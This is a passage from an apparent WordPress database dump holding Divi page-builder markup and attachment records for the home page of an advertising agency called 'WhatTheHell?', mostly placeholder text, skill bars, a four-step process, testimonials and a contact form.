_builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-10 14:36:30','2020-07-10 14:36:30','',134,'https://52.66.212.87/2020/07/10/134-revision-v1/',0,'revision','',0),(327,1,'2020-07-10 14:38:22','2020-07-10 14:38:22','what the hell creative agency, advertising marketing agency in delhi , mumbai, bangalore and hyderabad','what the hell creative agency','WhatTheHell? Logo','inherit','open','closed','','artboard-copy-1','','','2020-07-10 14:39:09','2020-07-10 14:39:09','',0,'https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-1.png',0,'attachment','image/png',0),(328,1,'2020-07-10 14:40:57','2020-07-10 14:40:57','WhatTheHell? Thumbnail images','WTH-LOGIN (1)','','inherit','open','closed','','wth-login-1','','','2020-07-10 14:41:20','2020-07-10 14:41:20','',0,'https://52.66.212.87/wp-content/uploads/2020/07/WTH-LOGIN-1.png',0,'attachment','image/png',0),(329,1,'2020-07-10 14:41:57','2020-07-10 14:41:57','https://52.66.212.87/wp-content/uploads/2020/07/cropped-WTH-LOGIN-1.png','cropped-WTH-LOGIN-1.png','','inherit','open','closed','','cropped-wth-login-1-png','','','2020-07-10 14:41:57','2020-07-10 14:41:57','',0,'https://52.66.212.87/wp-content/uploads/2020/07/cropped-WTH-LOGIN-1.png',0,'attachment','image/png',0),(333,1,'2020-07-18 20:42:12','2020-07-18 20:42:12','how whatthehell? do digital advertising for client.','Screenshot 2020-07-19 at 2.05.17 AM','','inherit','open','closed','','screenshot-2020-07-19-at-2-05-17-am','','','2020-07-18 20:43:14','2020-07-18 20:43:14','',0,'https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png',0,'attachment','image/png',0),(334,1,'2020-07-18 20:43:44','2020-07-18 20:43:44','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas 